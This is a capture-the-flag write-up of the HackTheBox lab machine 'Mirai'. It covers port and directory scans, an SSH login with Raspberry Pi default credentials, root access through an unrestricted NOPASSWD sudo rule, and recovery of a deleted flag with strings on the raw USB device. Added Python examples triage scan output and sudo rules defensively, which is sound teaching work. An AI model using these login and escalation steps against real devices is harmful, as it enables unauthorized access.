
【HTB】Mirai(Pi-hole)

Author: 天线锅仔 | Published 2021-12-12 00:41 | Read 0 times

Disclaimer

The host penetrated in this article was legally authorized. The tools and methods used here are for learning and exchange only; do not use the tools or penetration approaches described in this article for any illegal purpose. I accept no responsibility for any consequences arising from such use, nor for any misuse or damage caused.

Service enumeration

┌──(root💀kali)-[~/htb/Mirai]
└─# nmap -Pn -sV 10.10.10.48 -p-
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-11 07:58 EST
Nmap scan report for 10.10.10.48
Host is up (0.31s latency).                                                                                                                                                                                         
Not shown: 65529 closed ports                                                                                                                                                                                       
PORT      STATE SERVICE VERSION                                                                                                                                                                                     
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)                                                                                                                                                
53/tcp    open  domain  dnsmasq 2.76                                                                                                                                                                                
80/tcp    open  http    lighttpd 1.4.35                                                                                                                                                                             
1935/tcp  open  upnp    Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)                                                                                                                                              
32400/tcp open  http    Plex Media Server httpd                                                                                                                                                                     
32469/tcp open  upnp    Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 80 serves a CMS login page.
CMS name: Pi-hole
Version: Pi-hole Version v3.1.4 Web Interface Version v3.1 FTL Version v2.10

Port 32400 also serves a CMS page.
CMS name: Plex
Version: Version 3.9.1

Directory brute-forcing on port 80

┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.10.48/admin                                                                                                                         

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                                                                                                                    
 (_||| _) (/_(_|| (_| )                                                                                                                                                                                             
                                                                                                                                                                                                                    
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492

Output File: /root/dirsearch/reports/10.10.10.48/-admin_21-12-11_08-21-32.txt

Error Log: /root/dirsearch/logs/errors-21-12-11_08-21-32.log

Target: http://10.10.10.48/admin/

[08:21:33] Starting: 
[08:21:42] 301 -    0B  - /admin/.git  ->  http://10.10.10.48/admin/.git/  
[08:21:42] 200 -  274B  - /admin/.git/config                               
[08:21:42] 200 -   73B  - /admin/.git/description                          
[08:21:42] 200 -   23B  - /admin/.git/HEAD                                 
[08:21:42] 200 -  240B  - /admin/.git/info/exclude                         
[08:21:42] 200 -  182B  - /admin/.git/logs/HEAD                            
[08:21:42] 200 -  182B  - /admin/.git/logs/refs/heads/master               
[08:21:42] 301 -    0B  - /admin/.git/logs/refs/heads  ->  http://10.10.10.48/admin/.git/logs/refs/heads/
[08:21:42] 200 -  182B  - /admin/.git/logs/refs/remotes/origin/HEAD        
[08:21:42] 301 -    0B  - /admin/.git/logs/refs  ->  http://10.10.10.48/admin/.git/logs/refs/
[08:21:42] 301 -    0B  - /admin/.git/logs/refs/remotes/origin  ->  http://10.10.10.48/admin/.git/logs/refs/remotes/origin/
[08:21:42] 301 -    0B  - /admin/.git/refs/heads  ->  http://10.10.10.48/admin/.git/refs/heads/
[08:21:42] 301 -    0B  - /admin/.git/refs/remotes/origin  ->  http://10.10.10.48/admin/.git/refs/remotes/origin/
[08:21:42] 301 -    0B  - /admin/.git/logs/refs/remotes  ->  http://10.10.10.48/admin/.git/logs/refs/remotes/
[08:21:42] 301 -    0B  - /admin/.git/refs/remotes  ->  http://10.10.10.48/admin/.git/refs/remotes/
[08:21:42] 200 -   32B  - /admin/.git/refs/remotes/origin/HEAD
[08:21:42] 200 -   41B  - /admin/.git/refs/heads/master
[08:21:42] 200 -   11KB - /admin/.git/index                                
[08:21:42] 301 -    0B  - /admin/.git/refs/tags  ->  http://10.10.10.48/admin/.git/refs/tags/
[08:21:42] 200 -    1KB - /admin/.github/ISSUE_TEMPLATE.md                 
[08:21:42] 200 -    1KB - /admin/.github/PULL_REQUEST_TEMPLATE.md          
[08:21:42] 200 -  153B  - /admin/.gitignore/                               
[08:21:43] 200 -  107B  - /admin/.git/packed-refs                          
[08:21:43] 200 -  153B  - /admin/.gitignore                                
[08:21:44] 200 -  648B  - /admin/.pullapprove.yml                          
[08:21:48] 200 -  846B  - /admin/CONTRIBUTING.md                            
[08:21:49] 200 -    2KB - /admin/README.md                                  
[08:21:49] 200 -   14KB - /admin/LICENSE                                    
[08:22:12] 200 -  186B  - /admin/api.php                                    
[08:22:24] 200 -   14KB - /admin/debug.php                                  
[08:22:35] 301 -    0B  - /admin/img  ->  http://10.10.10.48/admin/img/     
[08:22:36] 200 -   14KB - /admin/index.php                                  
[08:22:36] 200 -   14KB - /admin/index.php/login/                           
[08:23:01] 301 -    0B  - /admin/scripts  ->  http://10.10.10.48/admin/scripts/
[08:23:02] 200 -   14KB - /admin/settings.php                               
[08:23:07] 301 -    0B  - /admin/style  ->  http://10.10.10.48/admin/style/ 

Directory brute-forcing on port 32400

┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.10.48:32400/web

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                                                                                                                    
 (_||| _) (/_(_|| (_| )                                                                                                                                                                                             
                                                                                                                                                                                                                    
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492

Output File: /root/dirsearch/reports/10.10.10.48-32400/-web_21-12-11_09-55-31.txt

Error Log: /root/dirsearch/logs/errors-21-12-11_09-55-31.log

Target: http://10.10.10.48:32400/web/

[09:55:33] Starting:    
[09:55:40] 200 -    0B  - /web/js                                                             
[09:56:15] 200 -    0B  - /web/common                                       
[09:56:15] 200 -    0B  - /web/common/                                      
[09:56:20] 200 -    0B  - /web/desktop/                                                                
[09:56:25] 200 -    5KB - /web/favicon.ico                                  
[09:56:30] 200 -    0B  - /web/img                                                          
[09:56:32] 200 -    4KB - /web/index.html                                   
[09:56:32] 200 -    0B  - /web/js/                                                    
[09:57:04] 200 -    0B  - /web/swf   
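The port-80 scan above is mostly interesting for one reason: the Pi-hole web interface was deployed as a git checkout, so /admin/.git/ and its internals (config, HEAD, index, logs) are served to anyone. Triaging a long dirsearch report by hand is tedious, so here is an added example (my own code, not from the original author or the Pi-hole project) that parses dirsearch result lines, groups the reachable paths into categories a defender should look at first, and confirms that a fetched .git/HEAD body really is a git ref rather than a generic 200 page. The sample report is a constructed subset of the lines from the two scans above; the categories and labels are my own.

```python
import re
from typing import Dict, List, Optional

# Constructed sample input: a subset of the dirsearch result lines from the two scans above.
SAMPLE_REPORT = """\
[08:21:42] 301 -    0B  - /admin/.git  ->  http://10.10.10.48/admin/.git/
[08:21:42] 200 -  274B  - /admin/.git/config
[08:21:42] 200 -   23B  - /admin/.git/HEAD
[08:21:42] 200 -   11KB - /admin/.git/index
[08:21:42] 200 -    1KB - /admin/.github/ISSUE_TEMPLATE.md
[08:21:42] 200 -  153B  - /admin/.gitignore
[08:21:49] 200 -    2KB - /admin/README.md
[08:22:24] 200 -   14KB - /admin/debug.php
[08:22:36] 200 -   14KB - /admin/index.php
[09:55:40] 200 -    0B  - /web/js
[09:56:32] 200 -    4KB - /web/index.html
"""

# One dirsearch result line: "[time] status - size - path [-> redirect]"
LINE_RE = re.compile(
    r"^\[(?P<time>\d{2}:\d{2}:\d{2})\]\s+(?P<status>\d{3})\s+-\s+(?P<size>\S+)\s+-\s+(?P<path>\S+)"
    r"(?:\s+->\s+(?P<redirect>\S+))?\s*$"
)

# Categories to triage first (labels are my own); the first matching pattern wins.
SENSITIVE = [
    ("vcs-metadata", re.compile(r"/\.git(?:/|$)")),            # .git internals: history, config, index
    ("vcs-metadata", re.compile(r"/\.(?:gitignore|github/|pullapprove\.yml)")),
    ("debug-endpoint", re.compile(r"/debug\.php$")),           # diagnostic pages leak config details
    ("project-docs", re.compile(r"/(?:README\.md|CONTRIBUTING\.md|LICENSE)$")),
]


def parse_line(line: str) -> Optional[dict]:
    """Parse one dirsearch line into a dict, or return None for banner/blank lines."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    hit = m.groupdict()
    hit["status"] = int(hit["status"])
    return hit


def classify(path: str) -> Optional[str]:
    """Return the triage category for a path, or None if it is not on the watch list."""
    for label, pattern in SENSITIVE:
        if pattern.search(path):
            return label
    return None


def triage(report: str) -> Dict[str, List[str]]:
    """Group reachable (status < 400) sensitive paths by category, keeping report order."""
    findings: Dict[str, List[str]] = {}
    for line in report.splitlines():
        hit = parse_line(line)
        if hit is None or hit["status"] >= 400:
            continue
        label = classify(hit["path"])
        if label:
            findings.setdefault(label, []).append(hit["path"])
    return findings


def looks_like_git_head(body: str) -> bool:
    """True if a fetched .git/HEAD body is a symbolic ref or a detached 40-hex commit id.
    A catch-all 200 page (HTML, redirect stub) fails this check, so it separates a real
    exposed repository from a false positive."""
    body = body.strip()
    return body.startswith("ref: refs/") or re.fullmatch(r"[0-9a-f]{40}", body) is not None


if __name__ == "__main__":
    for label, paths in triage(SAMPLE_REPORT).items():
        print(f"{label}:")
        for p in paths:
            print(f"    {p}")
    print("HEAD check:", looks_like_git_head("ref: refs/heads/master\n"))
```

Once a real exposed .git is confirmed, the fix is on the server side: either deploy the application without its checkout, or deny the path in the web server (lighttpd has a url.access-deny directive that can be applied to any URL matching a leading `.git`), and then verify by re-running the same triage against a fresh scan.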

Initial shell

After some Googling and research: Pi-hole is a lightweight ad blocker that is usually installed on a Raspberry Pi.

In other words, the target is very likely a Raspberry Pi.

And the Raspberry Pi default SSH credentials are pi:raspberry.

Try logging in:

┌──(root💀kali)-[~/htb/Mirai]
└─# ssh pi@10.10.10.48     
The authenticity of host '10.10.10.48 (10.10.10.48)' can't be established.
ECDSA key fingerprint is SHA256:UkDz3Z1kWt2O5g2GRlullQ3UY/cVIx/oXtiqLPXiXMY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.48' (ECDSA) to the list of known hosts.
pi@10.10.10.48's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 27 14:47:50 2017 from localhost

SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.


SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.

pi@raspberrypi:~ $ whoami
pi
pi@raspberrypi:~ $ id
uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),46(plugdev),60(games),100(users),101(input),108(netdev),117(i2c),998(gpio),999(spi)

Login successful!

Privilege escalation

Check sudo privileges:

pi@raspberrypi:~ $ sudo -l
Matching Defaults entries for pi on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User pi may run the following commands on localhost:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: ALL

We can escalate straight to root, then locate user.txt:

pi@raspberrypi:~ $ sudo su
root@raspberrypi:/home/pi# find / -name user.txt
/home/pi/Desktop/user.txt
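The sudo -l output above contains two rules for pi, and the second one, (ALL) NOPASSWD: ALL, is what makes the escalation a one-liner: any command, as any user, with no password prompt. When auditing many hosts it helps to parse this output mechanically and rank the rules. The following is an added example of mine (not the author's code) that parses the rule section of sudo -l output and assigns a severity; the sample text is the output shown above, and the severity labels are my own convention.

```python
import re
from typing import Dict, List

# Constructed sample input: the sudo -l output shown above for user pi.
SAMPLE_SUDO_L = """\
Matching Defaults entries for pi on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User pi may run the following commands on localhost:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: ALL
"""

# One rule line: "(runas_user[ : runas_group]) [TAG: ...] command"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>.+)$")

SEVERITY_ORDER = ["low", "medium", "high", "critical"]


def parse_sudo_l(output: str) -> List[Dict]:
    """Extract the rules listed after 'may run the following commands'."""
    rules: List[Dict] = []
    in_rules = False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True       # everything after this header is a rule line
            continue
        if not in_rules:
            continue              # skip the Defaults section (secure_path contains ':' too)
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = [p.strip() for p in m.group("runas").split(":")]
        tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
        rules.append({
            "runas_user": runas[0],
            "runas_group": runas[1] if len(runas) > 1 else None,
            "tags": tags,
            "command": m.group("cmd").strip(),
        })
    return rules


def severity(rule: Dict) -> str:
    """Rank a rule. 'ALL' means every command on the system; NOPASSWD removes the
    only interactive control. Specific commands still need a manual review, so they
    are not ranked above medium here."""
    full = rule["command"] == "ALL"
    nopass = "NOPASSWD" in rule["tags"]
    if full and nopass:
        return "critical"
    if full:
        return "high"
    if nopass:
        return "medium"
    return "low"


def worst_severity(output: str) -> str:
    """Highest severity among all rules, or 'low' when nothing is listed."""
    ranks = [SEVERITY_ORDER.index(severity(r)) for r in parse_sudo_l(output)]
    return SEVERITY_ORDER[max(ranks)] if ranks else "low"


if __name__ == "__main__":
    for r in parse_sudo_l(SAMPLE_SUDO_L):
        print(f"{severity(r):8s} ({r['runas_user']}) tags={r['tags']} {r['command']}")
    print("worst:", worst_severity(SAMPLE_SUDO_L))
```

On a Raspberry Pi image this rule comes from the stock /etc/sudoers.d entry for pi; combined with an unchanged default password, it means whoever knows the password is root. The practical mitigation is the one the login banner itself asks for (change the password), plus narrowing the sudo rule to the commands actually needed.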

root.txt has a backup on a USB stick:

root@raspberrypi:/home/pi# find / -name root.txt
/lib/live/mount/persistence/sda2/root/root.txt
/root/root.txt
root@raspberrypi:/home/pi# cat /root/root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...

List the block devices:

root@raspberrypi:/media# lsblk
NAME   MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT
sda      8:0    0   10G  0 disk 
├─sda1   8:1    0  1.3G  0 part /lib/live/mount/persistence/sda1
└─sda2   8:2    0  8.7G  0 part /lib/live/mount/persistence/sda2
sdb      8:16   0   10M  0 disk /media/usbstick
sr0     11:0    1 1024M  0 rom  
loop0    7:0    0  1.2G  1 loop /lib/live/mount/rootfs/filesystem.squashfs


It appears to be on:

sdb 8:16 0 10M 0 disk /media/usbstick

Take a look:

root@raspberrypi:/media/usbstick# cat damnit.txt 
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?

-James

So a small trick is still needed.

Look at /dev/sdb: it is the raw block device node for the USB stick, so its contents can be read directly as binary data.

root@raspberrypi:/media/usbstick# ls -alh /dev/sdb
brw-rw---- 1 root disk 8, 16 Dec 11 12:53 /dev/sdb

Run the strings command directly against /dev/sdb:

root@raspberrypi:/home/pi# strings /dev/sdb
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
/media/usbstick
2]8^
lost+found
root.txt
damnit.txt
>r &
{root.txt is here}
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James
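The strings run works because deleting a file only unlinks its directory entry; the data blocks stay on the stick until something reuses them, which is why the flag text is still sitting in the raw device next to the surviving damnit.txt. The file names appearing several times is the same effect on the directory blocks. To make that concrete, here is an added example of mine (not the author's command or any tool's source) that builds a small constructed stand-in for a raw device image, implements the printable-run extraction that strings performs, and reports the byte offset of each hit. The image layout, the placeholder flag and the offsets are all constructed for the example.

```python
import re
from typing import List, Tuple

BLOCK = 1024  # block size of the constructed image (illustrative, not a filesystem claim)


def build_sample_image() -> bytes:
    """Constructed stand-in for a raw device: one block still holding directory-entry
    names, one block holding the data of the deleted root.txt, one holding damnit.txt,
    and zero filler everywhere else."""
    img = bytearray(BLOCK * 8)
    # Directory block: a few binary header bytes, then the names (deleted entry keeps its name).
    names = (b"\x0b\x00\x00\x00\x0c\x00\x01\x02.\x00\x00\x00"
             + b"lost+found\x00\x00" + b"root.txt\x00" + b"damnit.txt\x00")
    img[BLOCK:BLOCK + len(names)] = names
    # Data block of the unlinked root.txt: still present because nothing overwrote it.
    flag = b"{root.txt placeholder: constructed sample flag}\n"
    img[3 * BLOCK:3 * BLOCK + len(flag)] = flag
    # Data block of the file that was not deleted (text from the stick above).
    note = (b"Damnit! Sorry man I accidentally deleted your files off the USB stick.\n"
            b"Do you know if there is any way to get them back?\n\n-James\n")
    img[5 * BLOCK:5 * BLOCK + len(note)] = note
    return bytes(img)


def extract_strings(data: bytes, min_len: int = 4) -> List[str]:
    """What `strings` does: runs of at least min_len printable ASCII bytes (tab and
    space through tilde). Newlines end a run, so each line of a text file is one hit."""
    pattern = re.compile(rb"[\x09\x20-\x7e]{" + str(min_len).encode() + rb",}")
    return [m.group().decode("ascii") for m in pattern.finditer(data)]


def find_strings_containing(data: bytes, needle: str, min_len: int = 4) -> List[Tuple[int, str]]:
    """Like `strings -t d | grep needle`: (byte offset, string) for every run containing needle."""
    pattern = re.compile(rb"[\x09\x20-\x7e]{" + str(min_len).encode() + rb",}")
    return [(m.start(), m.group().decode("ascii"))
            for m in pattern.finditer(data) if needle.encode() in m.group()]


def data_block_of(offset: int) -> int:
    """Which constructed block an offset falls in; useful to see that the recovered
    text lives in a data block rather than in the directory block."""
    return offset // BLOCK


if __name__ == "__main__":
    img = build_sample_image()
    print("all strings:", extract_strings(img))
    for off, s in find_strings_containing(img, "root.txt"):
        print(f"offset {off:6d} (block {data_block_of(off)}): {s}")
```

The defender-side lesson is the mirror image: a deleted file on removable or unencrypted media is not gone, so media that carried secrets should be wiped (overwritten) or encrypted from the start rather than merely cleaned up with rm.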

Summary

The key to this box is to take the services found by the scan, understand why someone would deploy them, and from that work out what kind of system they usually run on. Once it is clear the target is a Raspberry Pi, logging in over SSH with the Raspberry Pi default account gives the initial shell.

Article link: https://www.haomeiwen.com/subject/syolfrtx.html